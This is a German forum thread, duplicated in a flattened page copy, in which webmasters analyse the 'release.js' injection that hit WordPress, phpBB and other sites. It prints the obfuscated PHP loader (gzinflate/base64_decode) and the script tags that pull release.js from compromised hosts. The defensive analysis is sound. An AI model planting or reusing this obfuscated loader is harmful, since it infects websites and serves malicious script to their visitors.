» release.js: Virus in Wordpress, Gästebüchern und Foren

mgutt · 28.03.2012, 11:21

Wordpress 3:
http://www.peterglowka.de/daysofyorr-release-virus-entfernen/
http://forum.wpde.org/design/98457-code-schnipsel-auf-der-seite-charset-utf-8-a-2.html#post433652

phpBB3:
http://www.f1rejects.com/forum/viewtopic.php?f=3&t=4794

Simple Machines 2
http://www.simplemachines.org/community/index.php?topic=470927.0

CMS Builder
http://www.interactivetools.com/iforum/Products_C2/CMS_Builder_F35/Issue_with_Login_P92592/

myPHP Guestbook
bei einem meiner Kunden

Hier eine andere Variante mit direktem JS-Code:
Contao Open Source CMS
http://pastebin.de/24622

Auf Grund der starken Verbreitung in unterschiedlichsten Softwares vermute ich jetzt einfach mal, dass da ein Trojaner hinter steckt, der sich die FTP Logins gestohlen hat. Alternativ wäre auch eine Lücke in PHP oder sonstigen Servermodulen denkbar. Eine MySQL-Injection / XSS Attacke halte ich eher für ausgeschlossen bei dem Verbreitungsgrad.

Falls jemand mehr Infos hat, bitte mitteilen. Auch hätte ich gerne mal eine Kopie von der release.js, damit ich mir mal die Angriffe anschauen kann, die ausgeführt wurden.

Gruß

PhillyGee · Gesperrt Anmeldedatum: 01.05.2010 Beiträge: 3743

Na sehr geil...
Unser Blog von The Lower Life baut auf Wordpress auf und ich habe nun schno desöfteren dubiose GB Einträge gehabt, von unbekannten Leuten mit sehr unseriösen Homepages...

mgutt · 28.03.2012, 11:34

Dies ist der Schadecode, der gerne mal in Templates platziert wird:

#b58b6f# echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

Daraus wird dann:

<script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>

Andere Version:

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

<script type=”text/javascript” src=”http://www.daysofyorr.com/release.js”></script>

Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack.

Tornado47 · 28.03.2012, 12:07

mgutt
Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack.

Damits als Hexadezimalfarbe einen schönen rötlich-braunen farbtouch bekommt

(Ich weiß, war ein Schenkelklopfer

)

mgutt · 28.03.2012, 12:09

Der Angriff scheint schon seit Jahren so zu laufen:
https://www.google.de/search?q=%22echo(gzinflate(base64_decode%22

Da gibt es dann auch andere Nummern:
bbfd9f
0773e9
215d25
1b841a
a4bc48
7819f9
usw.

Vermutlich kann der Angreifer so ein Feedback bekommen ob der Angriff gelungen ist.

maxrev.de · Gast

Mach mit!

Wenn Dir die Beiträge zum Thread "release.js: Virus in Wordpress, Gästebüchern und Foren" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden:

Registrierte Mitglieder genießen die folgenden Vorteile:
✔ kostenlose Mitgliedschaft
✔ keine Werbung
✔ direkter Austausch mit Gleichgesinnten
✔ neue Fragen stellen oder Diskussionen starten
✔ schnelle Hilfe bei Problemen
✔ Bilder und Videos hochladen
✔ und vieles mehr...

Autor	Nachricht
mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	28.03.2012, 11:21 zitieren Wordpress 3: http://www.peterglowka.de/daysofyorr-release-virus-entfernen/ http://forum.wpde.org/design/98457-code-schnipsel-auf-der-seite-charset-utf-8-a-2.html#post433652 phpBB3: http://www.f1rejects.com/forum/viewtopic.php?f=3&t=4794 Simple Machines 2 http://www.simplemachines.org/community/index.php?topic=470927.0 CMS Builder http://www.interactivetools.com/iforum/Products_C2/CMS_Builder_F35/Issue_with_Login_P92592/ myPHP Guestbook bei einem meiner Kunden Hier eine andere Variante mit direktem JS-Code: Contao Open Source CMS http://pastebin.de/24622 Auf Grund der starken Verbreitung in unterschiedlichsten Softwares vermute ich jetzt einfach mal, dass da ein Trojaner hinter steckt, der sich die FTP Logins gestohlen hat. Alternativ wäre auch eine Lücke in PHP oder sonstigen Servermodulen denkbar. Eine MySQL-Injection / XSS Attacke halte ich eher für ausgeschlossen bei dem Verbreitungsgrad. Falls jemand mehr Infos hat, bitte mitteilen. Auch hätte ich gerne mal eine Kopie von der release.js, damit ich mir mal die Angriffe anschauen kann, die ausgeführt wurden. Gruß Gefällt mir Teilen twittern 3x bearbeitet
▲	pn email

PhillyGee Gesperrt Anmeldedatum: 01.05.2010 Beiträge: 3743	28.03.2012, 11:22 zitieren Na sehr geil... Unser Blog von The Lower Life baut auf Wordpress auf und ich habe nun schno desöfteren dubiose GB Einträge gehabt, von unbekannten Leuten mit sehr unseriösen Homepages...
▲	pn

mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	28.03.2012, 11:34 zitieren Dies ist der Schadecode, der gerne mal in Templates platziert wird: `#b58b6f# echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+"))); #/b58b6f#` Daraus wird dann: `<script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>` Andere Version: `#b58b6f# echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”))); #/b58b6f#` `<script type=”text/javascript” src=”http://www.daysofyorr.com/release.js”></script>` Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack. Verfasst am: 28.03.2012, 11:58 zitieren Die vermuten auch einen Trojaner, der FTP Passwörter geklaut hat: http://hup.hu/node/112669 Verfasst am: 28.03.2012, 12:02 zitieren Die hatten das auch auf der Seite, aber ich kann leider nicht sehen welches CMS die einsetzen: http://www.gruber-maler.de/produkte_leistungen/index.php
▲	pn email

Tornado47 Premium-Member Name: Max Strammer Geschlecht: Anmeldedatum: 25.01.2009 Beiträge: 11217	28.03.2012, 12:07 zitieren mgutt Was das "b58b6f" soll, konnte ich nicht herausfinden. Vielleicht ein Kürzel für den Hack. Damits als Hexadezimalfarbe einen schönen rötlich-braunen farbtouch bekommt (Ich weiß, war ein Schenkelklopfer )
▲	pn

mgutt Administrator Name: Marc Geschlecht: Anmeldedatum: 28.08.2004 Beiträge: 52420 Wohnort: Lohmar Meine eBay-Auktionen:	28.03.2012, 12:09 zitieren Der Angriff scheint schon seit Jahren so zu laufen: https://www.google.de/search?q=%22echo(gzinflate(base64_decode%22 Da gibt es dann auch andere Nummern: bbfd9f 0773e9 215d25 1b841a a4bc48 7819f9 usw. Vermutlich kann der Angreifer so ein Feedback bekommen ob der Angriff gelungen ist. 4x bearbeitet
▲	pn email

maxrev.de Gast	28.03.2012, 12:09 zitieren Mach mit! Wenn Dir die Beiträge zum Thread "release.js: Virus in Wordpress, Gästebüchern und Foren" gefallen haben oder Du noch Fragen hast oder Ergänzungen machen möchtest, solltest Du Dich gleich bei uns anmelden: Registrierte Mitglieder genießen die folgenden Vorteile: ✔ kostenlose Mitgliedschaft ✔ keine Werbung ✔ direkter Austausch mit Gleichgesinnten ✔ neue Fragen stellen oder Diskussionen starten ✔ schnelle Hilfe bei Problemen ✔ Bilder und Videos hochladen ✔ und vieles mehr...
▲

	Re: √	Letzter Beitrag
WordPress Entwickler:in \| 99° Bewerben Sie sich bis zum 15.06.2023. Jetzt bewerben! Zur Stellenanzeige auf Mein IT Job Ihre Bewerbung richten Sie bitte ausschließlich an die ausgeschriebene Firma. ________ 99° ist eine Designagentur in Wiesbaden mit 15 Mitarbeitern. Wir bieten... von kimjob	0 82	26.04.2023, 17:56 kimjob
Wordpress Ninja (m/w) Unser Klient ist eine aufstrebende Agentur aus Hamburg, die es versteht, ihren Kunden hinsichtlich ihres Webauftrittes sowie der Unternehmensdarstellung immer wieder neue, innovative Ideen präsentieren zu können. Dieses Angebot rundet weiterhin eine... von Martycareer	0 353	25.04.2014, 08:02 Martycareer
Webentwickler / in mit Schwerpunkt WordPress Webentwickler / in mit Schwerpunkt WordPress Web International Services Ltd. Ort: Auf Malta in St. Julians Beginn: Zum nächstmöglichen Termin Anstellungsverhältnis: Vollzeit Berufserfahrung: Mit mindestens 2 Jahren Berufserfahrung Wir entwickeln... von 1000jobboersen.de	0 288	23.04.2015, 12:59 1000jobboersen.de
Werkstudent im Bereich PHP/Wordpress Ort: Hamburg Unser Mandant ist die Full-Service-Agentur für OnlineTV Marketing – unabhängig und netzwerkübergreifend. OnlineTV ist für das Unternehmen modernes und zukunftsweisendes Entertainment – die fortwährende Professionalisierung des Werbemarktes... von Martycareer	0 368	21.03.2014, 14:29 Martycareer
Suche PHP Programmierer für Wordpress Blog Hallo Leute, ich suche - gegen eine "kleine" Bezahlung - einen PHP Programmierer, der mir für den bestehenden Wordpress Blog (BuddyPress) folgende Dinge programmieren kann bzw. bestehende Plugins anpassen kann: 1.) Eine... von UnbeatableMusic	1 519	10.06.2012, 15:21 UnbeatableMusic
Suchen TYPO3 WordPress - Webentwickler (m/w) Zur Verstärkung unseres Teams suchen wir zum nächstmöglichen Zeitpunkt eine oder einen erfahrenen Webentwickler m/w. Dein Aufgabenprofil: -Entwicklung von Web-Anwendungen -Templating -Konzeption und Architektur von Web-Projekten -Sehr gute Kenntnisse in... von Twenty2Media	0 560	10.04.2013, 10:38 Twenty2Media
Prakitkum im Bereich Ruby & Wordpress Unser Mandant ist die Full-Service-Agentur für YouTube Marketing – unabhängig und netzwerkübergreifend. OnlineTV ist für das Unternehmen modernes und zukunftsweisendes Entertainment – die fortwährende Professionalisierung des Werbemarktes und der Inhalte... von Martycareer	0 294	25.10.2013, 12:00 Martycareer
Hackerangriff in Wordpress? Ich kann helfen! Falls jemand einen gehackten Wordpress Blog hat und nicht weiter weiß, dann kann ich helfen. Der Aufwand lag bei meinen bisherigen Kunden bei max. 3 Stunden. D.h. 150,- € zzgl. Steuer. Wie ich dabei vorgehe: - Seite wird offline genommen - FTP Dateien... von mgutt	0 564	21.10.2016, 23:52 mgutt
Prakitkum im Bereich Ruby & Wordpress Ort: Hamburg Unser Mandant ist die Full-Service-Agentur für YouTube Marketing – unabhängig und netzwerkübergreifend. OnlineTV ist für das Unternehmen modernes und zukunftsweisendes Entertainment – die fortwährende Professionalisierung des Werbemarktes... von Martycareer	0 254	06.12.2013, 15:47 Martycareer
Praktikum im Bereich Ruby & Wordpress (m/w) Unser Mandant ist die Full-Service-Agentur für YouTube Marketing – unabhängig und netzwerkübergreifend. OnlineTV ist für das Unternehmen modernes und zukunftsweisendes Entertainment – die fortwährende Professionalisierung des Werbemarktes und der Inhalte... von Martycareer	0 212	11.02.2014, 11:53 Martycareer